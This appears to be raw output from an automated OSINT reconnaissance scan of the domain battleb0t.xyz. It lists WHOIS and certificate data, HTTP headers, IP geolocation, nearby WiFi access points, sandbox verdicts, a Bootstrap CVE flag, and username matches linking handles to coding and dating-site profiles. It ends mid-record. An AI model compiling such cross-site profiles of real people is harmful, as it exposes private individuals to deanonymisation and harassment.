| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | osbridge (Net ID: 00:15:D6:54:08:08) | 40.2024, 29.0398 |
| 2023-05-12 02:54:21 | HTTP Status Code | No | Web Spider | 0 | 1 | 3 | 0 | None | 521 | vscode.battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BBHWIRELESS (Net ID: 00:00:C5:D7:60:2C) | 41.8781, -87.6298 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | internal (Net ID: 00:0C:41:12:D6:E5) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:45:48 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'Chicago', u'security': {u'is_vpn': False}, u'city_geoname_id': 4887398, u'region_geoname_id': 4896861, u'country': u'United States', u'region': u'Illinois', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'CLOUDFLARENET', u'isp_name': u'Cloudflare, Inc.', u'organization_name': u'Cloudflare, Inc.', u'autonomous_system_number': 13335}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'60666', u'longitude': -87.6298, u'country_code': u'US', u'timezone': {u'abbreviation': u'', u'gmt_offset': u'', u'is_dst': u'', u'name': u'', u'current_time': u''}, u'latitude': 41.8781, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'104.21.6.166', u'continent': u'North America', u'region_iso_code': u'IL'} | 104.21.6.166 |
| 2023-05-12 02:44:24 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.109.153 |
| 2023-05-12 03:24:51 | Country | No | Country Name Extractor | 0 | 0 | 7 | 0 | None | Iceland | Domain Name: NETCRAFT.COM
Registry Domain ID: 509179_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-12-07T10:43:50Z
Creation Date: 1994-10-18T04:00:00Z
Registry Expiry Date: 2026-10-17T04:00:00Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: AUTHNS1.NETCRAFT.COM
Name Server: AUTHNS2.NETCRAFT.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain name: netcraft.com
Registry Domain ID: 509179_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2020-09-21T12:40:37.88Z
Creation Date: 1994-10-18T04:00:00.00Z
Registrar Registration Expiration Date: 2026-10-17T04:00:00.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Name Server: authns1.netcraft.com
Name Server: authns2.netcraft.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:56:11.35Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cross-origin-opener-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=jsIMdWNoCwdQGyyZGyYA%2Bk%2F%2FuxOwhAu2H4z%2BlgqTotxGWPo8hqWsqluH0WQNJMNDxGIz%2FauzgzXUlj2TX7zY2FcfHDEdJ6DQfKAJa9S%2BlmMzgJ2oNDB%2FfptzTg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5e7988238a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:45:41 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 2 | 0 | None | 34.0544, -118.244 | 185.199.110.153 |
| 2023-05-12 03:08:52 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.134 | 34.148.97.127 |
| 2023-05-12 03:09:18 | Vulnerability - General | Yes | Tool - Retire.js | 0 | 0 | 4 | 0 | None | CVE-2018-20676
Score: Unknown
Description: Unknown | https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | giters (Category: coding)
https://giters.com/ayshoo | ayshoo |
| 2023-05-12 02:56:39 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | {u'count': 22, u'search_terms': [{u'id': u'host', u'value': u'35.229.48.116'}], u'result': [{u'environment_id': 100, u'job_id': u'63b986ad26465530bf3c5b04', u'analysis_start_time': u'2023-01-07 14:50:21', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 0, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'89e65ebf9fe9f36ad886ea2ddd214e008b4eeb7c22ca04209ce7deac981a94a9', u'type': None, u'type_short': u'url', u'size': 86}, {u'environment_id': 100, u'job_id': u'63b92c8657cbe2638645fbb8', u'analysis_start_time': u'2023-01-07 08:25:43', u'vx_family': None, u'av_detect': None, u'environment_description': u'Windows 7 32 bit', u'threat_score': 5, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'4fe7f3926ed2b158addbe63f033c304e862259142b32f200571083f8c1090bb7', u'type': None, u'type_short': u'url', u'size': 101}, {u'environment_id': 100, u'job_id': u'63b3fbb4c539537999674635', u'analysis_start_time': u'2023-01-03 09:56:04', u'vx_family': None, u'av_detect': None, u'environment_description': u'Windows 7 32 bit', u'threat_score': 5, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'2ae5b7c90552dc0bfea77a833120647de0ca8b44c885d2e86b08755bfe2b0d49', u'type': None, u'type_short': u'url', u'size': 101}, {u'environment_id': 160, u'job_id': u'63b1da6cb79fb1747e53944f', u'analysis_start_time': u'2023-01-01 19:09:33', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 12, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'e862398af05408b5525884a6662ae362c288705f989b2cd5081292d2da304d80', u'type': None, u'type_short': u'url', u'size': 44}, {u'environment_id': 100, u'job_id': u'63a10361e52f927e9b6ad72e', u'analysis_start_time': u'2022-12-20 00:35:45', u'vx_family': None, u'av_detect': u'0', 
u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'0436572e0157f3d15b4fa79e524a513056120fb7d03e1c4be18bdbcd56f39aff', u'type': None, u'type_short': u'url', u'size': 69}, {u'environment_id': 160, u'job_id': u'63766b07cf04ba1b220d8dc2', u'analysis_start_time': u'2022-11-17 17:10:31', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'550f4c1b7c66a8517e2fb20ccc1c6ecef30f91a48349272d21e14ef78628f8a8', u'type': None, u'type_short': u'url', u'size': 55}, {u'environment_id': 100, u'job_id': u'636ef180d1c9326a4925b600', u'analysis_start_time': u'2022-11-12 01:06:09', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'f2556fc666fab8b0a67e68a03ff96d5347ebdf46fb79425a5c19338fdb8dd50b', u'type': None, u'type_short': u'url', u'size': 48}, {u'environment_id': 120, u'job_id': u'636c9fea72902d08670f15f1', u'analysis_start_time': u'2022-11-10 06:53:32', u'vx_family': u'Phishing site', u'av_detect': u'4', u'environment_description': u'Windows 7 64 bit', u'threat_score': 23, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'06e49fbb3c930e8bd8b0d29d4a0c65b34b42f07ba50d749759da507c357cd57a', u'type': None, u'type_short': u'url', u'size': 77}, {u'environment_id': 100, u'job_id': u'63597f52cf986273167b3dec', u'analysis_start_time': u'2022-10-26 18:41:23', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'9b6c767a83ad9e101aab7875c03fef9998ebb634994a68f092455fcef09b37ca', u'type': None, u'type_short': u'url', u'size': 336}, {u'environment_id': 100, 
u'job_id': u'6356dc85352138257c019e52', u'analysis_start_time': u'2022-10-24 18:42:14', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'dadadaa15e19ef9c2a983600ba16684260f2d8a2ad7abdae5ef4d3720e3f04c1', u'type': None, u'type_short': u'url', u'size': 341}, {u'environment_id': 100, u'job_id': u'6340254340d16e0a2d1801df', u'analysis_start_time': u'2022-10-07 13:10:28', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'3915ff7b4886499db28474c559936c4f13989a8c13d55ca8942d98b74060b5bf', u'type': None, u'type_short': u'url', u'size': 101}, {u'environment_id': 100, u'job_id': u'633c30aeb54aab03fc436a24', u'analysis_start_time': u'2022-10-04 13:11:00', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'8438978d36659fe126de5bdf3ff6506b6bebd65b79dbcdbbe5065d46ba16d3d8', u'type': None, u'type_short': u'url', u'size': 74}, {u'environment_id': 120, u'job_id': u'6331078cc06cef77a66ec199', u'analysis_start_time': u'2022-09-26 02:06:11', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': 68, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'0186b731d95e1f78a0fb99ab26860d1ebf02a69172fea4abff63ad144a6337e6', u'type': None, u'type_short': u'url', u'size': 46}, {u'environment_id': 100, u'job_id': u'6330fa73468b0c35ca1d3a9d', u'analysis_start_time': u'2022-09-26 01:03:50', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': 
u'accc235394b4acee27b8e42680741b4877ea836c33c661627b29cf8bd13f106f', u'type': None, u'type_short': u'url', u'size': 71}, {u'environment_id': 100, u'job_id': u'63292843cc561b278a0caa96', u'analysis_start_time': u'2022-09-20 02:41:07', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 65, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'79c6aa841bf5874b35646cf7f5a083e6887cd50479d71ea9646f728d9c68e9b9', u'type': None, u'type_short': u'url', u'size': 46}, {u'environment_id': 100, u'job_id': u'630c1fdca1db121fef77b765', u'analysis_start_time': u'2022-08-29 02:09:33', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'6b13c22a4e454fe47c4fa9acd4bd8e10514224bc7663c6251b69fd1d650a7795', u'type': None, u'type_short': u'url', u'size': 67}, {u'environment_id': 100, u'job_id': u'62fb6612840ec63784115ce2', u'analysis_start_time': u'2022-08-16 09:40:35', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'7df1a40eceecc8b444d042c1ffe4058ab057ba7b8d9023392e6fb5997947e311', u'type': None, u'type_short': u'url', u'size': 50}, {u'environment_id': 100, u'job_id': u'62f5a4518bfb7009a87660a0', u'analysis_start_time': u'2022-08-12 00:52:33', u'vx_family': u'Phishing site', u'av_detect': u'6', u'environment_description': u'Windows 7 32 bit', u'threat_score': 10, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'46e02f3d16603e5230418b021dd86036c13652e45ecaa2cdeb9280bcdefd5d71', u'type': None, u'type_short': u'url', u'size': 66}, {u'environment_id': 110, u'job_id': u'62ebcf1020213241597b9103', u'analysis_start_time': u'2022-08-04 13:52:17', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 
bit (HWP Support)', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'2c2d2330c4f28de32b7457f0d5738e086e1fe21b38f44dc0bf301963aac2537d', u'type': None, u'type_short': u'url', u'size': 116}, {u'environment_id': 100, u'job_id': u'62eb1142edfef557984a6458', u'analysis_start_time': u'2022-08-04 00:22:27', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'b9380c0d5fb860d1b55d8764ccc4ac1c86489a28c0a63f3e01ffd798d9030cec', u'type': None, u'type_short': u'url', u'size': 75}, {u'environment_id': 100, u'job_id': u'62df7746a88af4304c4ab329', u'analysis_start_time': u'2022-07-26 05:19:12', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 29, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'9602d6371d64899a229eb0561ab5fd34b3b0b9b26d204d55960e81d2750de0f0', u'type': None, u'type_short': u'url', u'size': 67}, {u'environment_id': 100, u'job_id': u'62df3d0d7dfb34397974c439', u'analysis_start_time': u'2022-07-26 01:02:05', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 41, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'1be19964b1f53d0263d13c642802d5154e9dcd14fef7264b7b797d81cb3d01f7', u'type': None, u'type_short': u'url', u'size': 81}]} | 35.229.48.116 |
| 2023-05-12 02:52:20 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:34:48:36:b2:51:77:1f:45:f7:ca:23:53:09:6b:f8:20:f7
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:46:18 2022 GMT
Not After : Mar 27 01:46:17 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:b7:86:7e:22:b8:47:2a:2a:20:fc:69:54:4c:4c:
8d:ea:3f:a1:0c:0e:11:0f:7e:c1:26:df:52:aa:7e:
94:3a:df:e1:4c:c1:e1:54:54:7a:c2:7a:eb:d8:cc:
df:41:19:00:a3:7b:e6:18:3e:51:47:37:04:be:39:
e6:bf:91:38:96:6a:40:69:b8:63:75:51:8c:52:3a:
41:07:8f:c4:ec:e7:d6:72:77:98:6d:17:b7:fd:4c:
4c:0f:1e:e2:38:f3:1e:28:62:8d:25:cc:29:b7:fc:
af:91:3e:9d:e5:92:07:d2:8d:09:ca:64:eb:80:76:
ae:38:a2:33:49:07:84:c8:02:f9:d3:21:2b:ce:01:
78:68:73:b9:2a:22:16:eb:78:90:34:44:73:52:fa:
b4:e5:7a:78:b5:62:9e:70:95:d0:26:0e:c1:b7:b4:
12:fd:9f:10:09:67:d9:3c:f0:82:32:ed:27:d0:55:
a7:30:ce:0b:b7:0a:ef:86:ec:19:5d:c1:a0:11:f8:
d8:f7:da:51:1c:ce:c6:23:90:13:7e:ab:f3:de:c1:
8e:52:9d:26:8b:16:dc:5c:ae:23:f8:3d:43:96:47:
e1:0d:83:73:94:c2:e5:ad:91:ed:93:fe:48:67:3b:
6c:8e:00:5a:b6:2f:0f:94:18:91:b3:ed:bb:bf:d8:
25:d1
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
73:BD:0E:B3:ED:9F:6A:FE:37:97:44:54:03:BB:B6:CC:83:95:C8:48
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 27 02:46:18.221 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:73:56:94:2F:31:A8:B8:1A:98:8B:10:59:
F6:53:2E:1E:0E:70:CF:6D:BF:D5:0A:CF:1C:31:3D:5B:
4C:23:37:67:02:21:00:9B:F2:01:A0:12:B4:3C:90:39:
EA:84:E4:22:FA:75:BD:A0:C4:ED:89:F2:6C:18:97:FC:
B8:F5:F0:56:AE:8E:01
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Dec 27 02:46:18.274 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:05:3B:2E:33:08:22:D3:2E:0C:71:5D:CE:
BB:25:C6:58:42:B3:AE:CA:D4:8F:0C:AD:30:6E:E3:A1:
6E:7B:1D:DD:02:21:00:B2:4C:68:98:17:12:76:10:DB:
F7:E5:7C:1B:1E:CC:3D:22:69:57:D1:43:50:5C:F3:6B:
C4:4A:45:D2:97:77:5D
Signature Algorithm: sha256WithRSAEncryption
b5:fc:32:be:0b:ef:36:0b:4c:2f:42:14:e0:23:44:71:fe:bb:
33:07:72:8b:73:2a:ff:5f:08:8a:b4:9e:62:31:57:db:a3:8b:
f5:eb:48:64:20:6d:a4:a1:01:ca:d1:c5:02:57:6b:fa:f9:2f:
81:b9:22:b3:b6:f7:75:49:42:43:c2:49:2f:7b:79:d9:5f:e2:
e1:45:6e:ec:6b:80:ad:7d:c6:5c:28:b1:1a:b9:4e:15:e6:17:
ae:e5:e8:ce:6c:bb:82:2d:39:fb:ee:42:88:dd:71:2d:32:a2:
58:59:d5:82:ef:a1:1f:ed:eb:e8:31:65:9c:54:f9:39:7e:04:
23:d4:63:6c:f9:8a:fc:fe:32:6a:54:24:b9:87:53:d3:3a:ad:
b3:bc:74:e2:09:7e:05:f6:6a:b2:b2:c9:5d:15:04:56:51:5c:
3a:24:39:1f:c5:f0:1f:67:f8:ff:79:1d:11:62:57:f1:41:b4:
c9:fc:7e:59:46:0a:3f:48:58:e0:4d:a6:0a:10:72:2e:ed:1f:
b6:1b:19:4d:de:20:09:8c:c8:8c:26:1e:82:7a:3b:88:90:1a:
7c:c4:2b:f0:2f:ca:82:25:42:7e:50:54:62:30:3f:49:63:0c:
7d:f1:3b:f3:90:d8:3c:ee:c3:09:83:3d:a5:08:3a:22:6f:f5:
e3:2e:e6:d2
| battleb0t.xyz |
| 2023-05-12 03:18:47 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image Orientation': (0x0112) Short=Horizontal (normal) @ 18} | https://pics.battleb0t.xyz/images/withat_2.jpg |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | FriendFinder-X (Category: dating)
https://www.friendfinder-x.com/profile/ayhu | ayhu |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | cross-origin-resource-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=WwRFDMWv1i%2FLL8I%2BSQXrEl8P6VG5M1GGitMkpd4FkAGmtOdqQDCLc17nGzjDcmqZpet%2BvxBX8CUcOAv3alTgafYDwFhVZzoAKiiOmj1uFX8dLMhZ1ZA2lQdL%2FA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60363a5a178c-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c572ccdc9c6e26c-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.71.14 |
| 2023-05-12 02:45:07 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'CA', u'country_tld': u'.us', u'ip': u'2606:50c0:8001::153', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/Los_Angeles', u'city': u'San Francisco', u'network': u'2606:50c0::/32', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv6', u'latitude': 37.7809, u'in_eu': False, u'utc_offset': u'-0700', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'FASTLY', u'postal': u'94142', u'asn': u'AS54113', u'country': u'US', u'region': u'California', u'longitude': -122.4245, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 2606:50c0:8001::153 |
| 2023-05-12 02:54:34 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | CloudFlare CloudFlare Load Balancer | 104.21.71.14 |
| 2023-05-12 02:51:28 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://o.length/4-2;var', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/twbs/bootstrap/blob/master/license)', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://etc.clientlibs/bd-com/clientlibs/clientlib-site/resources/image/icons/arrow-forward-boosted-blue.svg);background-position:0;background-repeat:no-repeat;content', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://etc.clientlibs/bd-com/clientlibs/clientlib-dependencies.lc-a8a835b60a51c1a16bfe62bc508a0553-lc.min.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://etc.clientlibs/bd-com/clientlibs/clientlib-dependencies.lc-c134f778cda2725b23581fb9bbc5b854-lc.min.css', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://etc.clientlibs/bd-com/clientlibs/clientlib-site.lc-bd09710473c40d28e121912e717b2ace-lc.min.css', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://etc.clientlibs/bd-com/clientlibs/clientlib-base.lc-bedc8b6f121e0f7199ca3e44738c97cd-lc.min.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://p.height/2);r&&a.is(r', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://t.duration/o,r=0,l=1,s=i.queue().length;for(!n&&i.is', u'type': 